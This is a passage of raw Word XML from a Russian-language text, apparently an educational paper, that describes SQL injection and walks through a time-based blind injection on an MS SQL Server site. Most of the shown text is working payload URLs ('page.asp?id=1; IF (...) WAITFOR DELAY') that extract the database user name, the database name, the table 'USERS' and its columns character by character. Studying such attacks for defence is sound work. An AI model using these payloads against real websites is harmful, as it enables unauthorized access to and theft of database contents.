          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> null, ‘t</w:t>
      </w:r>
      <w:r w:rsidR="00347079" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">est’, null FROM </w:t>
      </w:r>
      <w:r w:rsidR="00347079" w:rsidRPr="00AE219B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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8E2951" w:rsidRDefault="00165AA1" w:rsidP="00347079">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">После </w:t>
      </w:r>
      <w:r w:rsidR="0093054C" w:rsidRPr="002B6CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">того, как </w:t>
      </w:r>
      <w:r w:rsidRPr="002B6CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>определен</w:t>
      </w:r>
      <w:r w:rsidR="0093054C" w:rsidRPr="002B6CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="002B6CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> количеств</w:t>
      </w:r>
      <w:r w:rsidR="0093054C" w:rsidRPr="002B6CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="002B6CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093054C" w:rsidRPr="002B6CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">нулевых </w:t>
      </w:r>
      <w:r w:rsidRPr="002B6CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>аргументов и не нулевых аргументов (NOT NULL),</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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034EEB" w:rsidRPr="009F0170" w:rsidRDefault="002A4219" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc420429532"/>
      <w:bookmarkStart w:id="7" w:name="_Toc420596239"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Алгоритм внедрения sql-кода при</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3" w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> помощью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Default="008E2C84" w:rsidP="008E2C84">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2C84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Инъекция с помощью оператора </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2C84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2C84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> не всегда срабатывает.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На сервере может стоять проверка типа и количества данных, полученные в результате запроса. В таком случае произойдёт перенаправление на страницу с ошибкой либо результаты инъекции и вовсе не будут показаны.</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Поэтому злоумышленник </w:t>
      </w:r>
      <w:r w:rsidR="00671BB3" w:rsidRPr="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мож</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ет</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> использовать технику </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или слепой sql-инъекции</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3" w:rsidRPr="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3">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true/false.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A4219" w:rsidRDefault="002A4219" w:rsidP="00671BB3">
      <w:pPr>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(LEN(USER)=1)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(LEN(USER)=2)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http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)</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последнем внедрении страница должна зависнуть на 10 секунд, если длинна имени пользователя СУБД равна 3. </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Далее необходимо определить имя пользователя. Будем перебирать коды символов по позициям в имени:</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(ASCII(lower(substring((USER),1,1)))&gt;97) WAITFOR DELAY '00:00:10'-- (+10 seconds)</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(ASCII(lower(substring((USER),1,1)))=98)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(ASCII(lower(substring((USER),1,1)))=99)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(ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00053534" w:rsidRDefault="000606E8" w:rsidP="000606E8">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Первое внедрение произойдёт успешно если </w:t>
      </w:r>
      <w:r w:rsidRPr="000606E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">имя пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">не </w:t>
      </w:r>
      <w:r w:rsidRPr="000606E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">начинается с буквы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'a' но с буквы стоящей дальше по алфавиту. Четвёртое внедрение произойдёт успешно, если имя пользователя начинается с буквы 'd'.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00034EEB"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мы определяем следующую букву в имени пользователя и она оказывается 'b':</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(ASCII(lower(substring((USER),2,1)))&gt;97) WAITFOR DELAY '00:00:10'-- (+10 seconds)</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lastRenderedPageBreak/>
        <w:t>http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00034EEB" w:rsidRPr="000606E8" w:rsidRDefault="00034EEB"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Также и третью букву, которая оказывается 'o':</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(ASCII(lower(substring((USER),3,1)))&gt;97)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(ASCII(lower(substring((USER),3,1)))&gt;115)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(ASCII(lower(substring((USER),3,1)))&gt;105)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(ASCII(lower(substring((USER),3,1)))&gt;110)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(ASCII(lower(substring((USER),3,1)))=109)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(ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)</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F5ACA"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 xml:space="preserve">Далее необходимо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текущеё базы данных для этого пользователя:</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(LEN(DB_NAME())&gt;4)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(LEN(DB_NAME())&gt;6)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(LEN(DB_NAME())=8) WAITFOR DELAY '00:00:10'-- (+10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8"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Мы определил</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и, что длина имени базы данных равна 8.  Также как и с именем пользователя можно определить все символы в имени текущей базы данных:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A325B" w:rsidRPr="008E2951" w:rsidRDefault="008A325B"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(ASCII(lower(substring((DB_NAME()),1,1)))=112)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(ASCII(lower(substring((DB_NAME()),2,1)))=114)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(ASCII(lower(substring((DB_NAME()),3,1)))=111)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(ASCII(lower(substring((DB_NAME()),4,1)))=45)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(ASCII(lower(substring((DB_NAME()),5,1)))=100)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(ASCII(lower(substring((DB_NAME()),6,1)))=98)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(ASCII(lower(substring((DB_NAME()),7,1)))=45)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(ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="008A325B"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27327E" w:rsidRDefault="0027327E" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027327E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этими действиями мы выяснили, что имя текущей базы данных - "</w:t>
      </w:r>
      <w:r w:rsidRPr="0027327E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0027327E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PRO-DB-1";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="0027327E" w:rsidRDefault="000606E8" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00865DCA" w:rsidRDefault="00865DCA" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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необходимо выяснить длину имени таблицы. Вот таким перебором можно выяснить</w:t>
      </w:r>
      <w:r w:rsidRPr="00865DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>длина имени первой таблицы, созданной администратором, равна 5. Колонка xtype показывает, кем была созданна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AD3834" w:rsidRPr="00865DCA"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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00F54FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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='U')&gt;3) WAITFOR DELAY '00:00:10'--  (+10 seconds)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lastRenderedPageBreak/>
        <w:t>http://[site]/page.asp?id=1; IF (LEN(</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00F54FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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='U')&gt;6) WAITFOR DELAY '00:00:10'--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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00F54FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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='U')=5) WAITFOR DELAY '00:00:10'--  (+10 seconds) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865DCA" w:rsidRPr="008E2951" w:rsidRDefault="00865DCA" w:rsidP="00865DCA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2951">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="008E2951" w:rsidRDefault="00865D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Далее узнаём имя этой таблицы посимвольно, имя таблицы оказывается </w:t>
      </w:r>
      <w:r w:rsidRPr="00865DCA">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lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00865DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865DCA" w:rsidRPr="008E2951" w:rsidRDefault="00865DCA" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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=char(85)),1,1)))=117)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=char(85)),2,1)))=115)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=char(85)),3,1)))=101)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=char(85)),4,1)))=114)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=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="00865DC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rPr>
        <w:t xml:space="preserve">Определение имён других </w:t>
      </w:r>
      <w:r>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Pr="0017464E"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lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (LEN(</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">=char(85) and </w:t>
      </w:r>
      <w:r w:rsidR="00317A2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">name != </w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>USERS</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">')=6) </w:t>
      </w:r>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAITFOR</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">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Pr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> '00:00:10'--  (+10 </w:t>
      </w:r>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</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http://[site]/page.asp?id=1; IF (LEN(</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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PRO-DB-1.information_schema.columns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='USERS')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)</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753818" w:rsidRPr="00753818">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, что</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имя первой колонки таблицы "Users"</w:t>
      </w:r>
      <w:r w:rsidR="00753818">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - "User"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</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='USERS'),1,1)))=117)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='USERS'),2,1)))=115)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='USERS'),3,1)))=101)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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)</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5381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Таким же способом, но с добавлением условия определяем имена всех остальных колонок, предварительно исключив уже найденное имя первой колонки:</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rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753818" w:rsidRPr="00F54FFF" w:rsidRDefault="00753818"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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00F54FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1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 xml:space="preserve"> from PRO-DB-1.information_schema.columns where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F54FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
